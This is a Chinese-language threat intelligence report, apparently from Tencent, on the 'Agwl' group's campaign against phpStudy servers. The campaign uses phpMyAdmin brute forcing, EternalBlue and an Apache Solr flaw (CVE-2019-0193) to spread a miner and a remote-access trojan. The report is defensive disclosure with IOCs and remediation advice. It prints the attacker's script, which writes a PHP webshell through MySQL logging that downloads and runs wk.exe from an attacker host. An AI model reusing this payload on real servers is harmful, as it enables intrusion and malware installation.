Agwl团伙再攻Phpstudy，新增Apache Solr漏洞利用

一、背景

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包，通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装，无需配置即可直接安装使用，具有PHP环境调试和PHP开发功能，在国内有着近百万PHP语言学习者、开发者用户。

2019年9月20日，在杭州西湖区公安分局网警大队通报的打击涉网违法犯罪暨“净网2019”专项行动战果中，公布了破获的一起在PhpStudy中植入后门的案例。通报内容指出，犯罪嫌疑人使用黑客手段非法侵入PhpStudy软件官网，篡改软件安装包内容并植入后门，并利用该手段共非法控制计算机67万余台，非法获取账号密码类、聊天数据类、设备码类等数据10万余组。最后，利用盗取的账号密码，入侵修改服务器数据实施诈骗，非法牟利共计600余万元。详细内容参考：https://mp.weixin.qq.com/s/s-5cVTxIJcDfdRjtnEnI0g

这是一起严重的供应链攻击事件，通过入侵开发组件供应网站并对公开下载的程序集成包进行污染，不法分子”悄无声息“地将后门植入到大量开发者的电脑中。

与供应链攻击事件的偶发性不同，PhpStudy弱口令爆破攻击事件则呈现持续高发态势。腾讯安全御见威胁情报中心在2018年7月发现针对phpMyadmin后台管理登录页面爆破登录，植入远控和挖矿木马的事件。

https://www.freebuf.com/column/178753.html

2019年1月又发现“Agwl”团伙针对phpStudy网站服务器的批量入侵行动。

https://www.freebuf.com/column/195035.html

2019年8月腾讯安全御见威胁情报中心监测到“Agwl”团伙在最新的入侵行动将Linux系统纳入攻击范围。

https://www.freebuf.com/column/210631.html

近日，御见威胁情报中心检测到“Agwl”团伙针对phpStudy网站服务器再度发起攻击，此次攻击“升级”后，被入侵服务器会下载释放“永恒之蓝”漏洞攻击、SQL爆破攻击、Apache Solr 8月公布的最新漏洞攻击模块，并使用这些攻击模块进一步扩散传播当前病毒的核心程序。

此次受“Agwl”团伙攻击影响超过一万台服务器，影响严重地区分别北京、广东和浙江。受害地区分布如下：

“Agwl”团伙攻击影响范围分布图

二、详细分析

开始攻击时，黑客首先针对web服务相关端口进行扫描，发现开放端口的IP后，利用路径特征探测目标IP是否采用phpMyAdmin系统，如果发现存在，则使用弱口令尝试进行爆破登录。

爆破攻击成功则通过cmd_shell下载植入木马http[:]//down.us-hack.ru/wk.exe。wk.exe会继续下载挖矿木马及远控木马，同时下载SQL爆破、“永恒之蓝”漏洞利用、Apache Solr漏洞(CVE-2019-0193)利用三种攻击方式进一步扩散传播病毒。

“Agwl”针对PhpStudy攻击流程

2.1 前期准备

我们从服务器下载得到压缩包文件Python36.zip，解压释放得到phpstudy_python3.py。phpstudy_python3.py是一个Python脚本文件，作为探测攻击核心脚本，落地后在木马释放的Python程序环境下运行。

从脚本开头定义了变量 “C:\\AppServ\\MySQL\\”、“linuxphpstudy”等，为同时针对Windows系统和Linux系统攻击作准备。 

开始探测前，首先先通过扫描工具Masscan(文件名为0893.exe)扫描80、81、82、88、8080、8081、8082端口，扫描范围为全网IP段(1.0.0.0~223.255.255.255)，并将开放端口的IP保存至open.txt，随后执行bpsa.bat加载探测程序。

Bpsa.bat加载python探测脚本phpstudy_python3.py针对扫描到开放端口的IP进行探测，探测成功则执行shell，根据攻击过程中的计数参数，探测攻击9999次之后暂停。

2.2 探测入侵

开始探测时phpstudy_python3.py开启多个工作线程。首先通过匹配路径url + "/phpmyadmin"来发现是否存在phpmyadmin。

发现phpmyadmin后，请求路径url+"/pmd"尝试获取登录页面，若成功获取到登录页面，则进入bppass()中进行弱口令爆破。

爆破使用的弱口令密码保存在password.txt文件中，打开该文件可以看到，目前用来爆破的弱口令高达3000多个

爆破成功后，进入get_shell()中，将一段sql命令传给shell执行，该SQL命令最终通过wget.exe下载木马wk.exe并启动。

path = path + "wk.php"

wget = '''http://down.us-hack.ru/wget.exe'''

xz = str(base64.b64encode(wget.encode('utf-8')),'utf-8')

wk = '''wget.exe http://down.us-hack.ru/wk.exe &wk.exe'''

xz1 = str(base64.b64encode(wk.encode('utf-8')),'utf-8')

hm = '''wget.exe http://14.29.194.121:22/angge.php'''

xz2 = str(base64.b64encode(hm.encode('utf-8')),'utf-8')

wjm = '''"wget.exe", "w"'''

sql = ["set global general_log='on';","SET global general_log_file='"+path+"';","SELECT '<?php $wk = fopen("+wjm+");$sj =file_get_contents(base64_decode('"+xz+"')) ;fwrite($wk, $sj);fclose($wk);sleep(3);@system(base64_decode('"+xz1+"'));@system(base64_decode('"+xz2+"'));phpinfo();?>';"]

2.3 扩散传播

2.3.1 SQL弱口令爆破

在入侵成功后续阶段，通过SQL爆破程序CSQL.exe进行端口扫描爆破(1433/2433/3433)，扫描范围为全网段IP。

爆破成功后通过xp_

cmdshell下载http[:]//down.us-hack.ru/wk.exe植入。

2.3.2 “永恒之蓝”漏洞攻击

扫描全网段IP的445端口，针对开放端口的IP，利用NSA武器中的“永恒之蓝”、“双脉冲星”、“永恒浪漫”进行漏洞利用攻击。

漏洞攻击成功后执行x86/x64.dll下载下载http[:]//down.us-hack.ru/wk.exe植入。

2.3.3 Apache Solr漏洞攻击

2019年8月1日，Apache Solr官方发布了CVE-2019-0193漏洞预警，漏洞危害评级为严重。

漏洞出现在Apache Solr的DataImportHandler，该模块是一个可选但常用的模块，用于从数据库和其他源中提取数据。它具有一个功能，其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本，因此攻击者可以通过构造危险的请求，从而造成远程命令执行。

攻击时先扫描端口(全网段IP)，然后将开放Solr默认端口8983的IP保存，并利用得到的IP列表构造攻击时需要的URL：http://IP:8983保存至ips.txt。

扫描到开放8983端口的IP地址后，利用CVE-2019-0193 (Python攻击代码打包为ll.exe)对每个IP进行攻击。（漏洞攻击代码github：https://github.com/jas502n/CVE-2019-0193/blob/master/CVE-2019-0193.py）

攻击成功后植入http[:]//down.us-hack.ru/wk.exe

2.4 挖矿木马

入侵成功后下载挖矿木马母体hxxp://down.halloo.ru/udefrag.zip，解压后释放到C:\Windows\Fonts\debug\目录下。

Udefrag.exe是百度拼音的正常子程序，在运行时会自动加载同目录下的configure.dll(由木马替换而来)执行，病毒使用正规文件进行“白+黑”启动，试图绕过杀软检测。

configure.dll被加载执行后首先删除旧的挖矿文件C:\Windows\System\debug\svchost.exe，然后下载挖矿文件压缩包xmr.zip并利用下载的解压程序unzip.exe进行解压释放到C:\Windows\System\debug\目录。

最后启动挖矿进程，矿机程序采用开源挖矿程序XMRSTAK编译。矿池地址为：pool.us-hack.ru:3333，钱包地址：

A9RvGu2BG6S6NNo13YyU1TgcDFP7NXFUDZ84RGgE5N3X16WSD5S9ockNpfvnmLpjf326SReabxtwuAMSwgsQwwpLDCbqi1Z（base64解码后）

2.5远控木马

在攻击最后阶段会下载http[:]//down.us-hack.ru/agwl.exe，agwl.exe下载大灰狼远控木马http[:]//dash.us-hack.ru/NetSyst96.dll加载到内存执行。

三、安全建议

1、 服务器关闭不必要的高危端口，如139/445/1433等；

2、 加固服务器，修补服务器安全漏洞，及时修复“永恒之蓝”系列漏洞；Apache Solr CVE-2019-0193漏洞修复建议将Apache Solr升级至8.2.0或之后的版本

3、 对于phpStudy一类的集成环境，在安装结束后应及时修改phpmyadmin 密码、MySQL密码为高强度密码，避免被黑客探测入侵。

4、如有发现感染“Agwl”挖矿病毒，可按照以下方法手动清理：

删除目录

C:\Windows\Fonts\Python36\

删除文件

C:\Windows\Fonts\debug\Udefrag.exe

C:\Windows\Fonts\debug\Configure.dll

C:\Windows\System\debug\svchost.exe

C:\Windows\System32\wk.exe

C:\ProgramData\wk.exe

C:\xp.exe

5、网站管理员可使用腾讯云网站管家智能防护平台（网址：https://s.tencent.com/product/wzgj/index.html），该系统具备Web入侵防护，0Day漏洞补丁修复等多纬度防御策略，可全面保护网站系统安全。

6、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。

IOCs

IP

103.13.221.20

14.29.194.121

Domain

down.us-hack.ru

down2.us-hack.ru

down.halloo.ru

dash.us-hack.ru

URL

hxxp://down.halloo.ru/Alloy.zip

hxxp://down.halloo.ru/udefrag.zip

hxxp://down.halloo.ru/zx.exe

hxxp://down.halloo.ru/Python36.zip

hxxp://down.halloo.ru/authman.zip

hxxp://down.us-hack.ru/update.exe

hxxp://down.us-hack.ru/vc_redist.x64.exe

hxxp://down.us-hack.ru/wk.exe

hxxp://down.us-hack.ru/xmr.zip

hxxp://down.us-hack.ru/udefrag.zip

hxxp://down.us-hack.ru/agwl.exe

hxxp://down.us-hack.ru/authman.zip

hxxp://down.us-hack.ru/Python36.zip

hxxp://down.us-hack.ru/unzip.exe

hxxp://dash.us-hack.ru/NetSyst96.dll

hxxp://14.29.194.121:22/angge.php

MD5

a11eb542f7afda5d8488efda4cdf28ee

89d422febf1eba1a7fe0fabb39544d69

2a516ca66cafd6e1e64ee4620503abaa

a74f591e5b09adaae4d37fae16e65405

9579ec1a5388ba40b585103ac065e04d

3418ebb7ea2e04484504d6cb34a2f51e

44d14a9a862278d416f27740b3488c26

ea22ed41cec42e73ad341b82959ff86c

047a53b43f10c50c651bdea7a3842150

3ccc45a219dfc96d0062a58eb29384b9

钱包地址：

A9RvGu2BG6S6NNo13YyU1TgcDFP7NXFUDZ84RGgE5N3X16WSD5S9ockNpfvnmLpjf326SReabxtwuAMSwgsQwwpLDCbqi1Z

参考链接：

https://www.freebuf.com/column/178753.html

https://www.freebuf.com/column/195035.html

https://www.freebuf.com/column/210631.html

https://issues.apache.org/jira/browse/SOLR-13669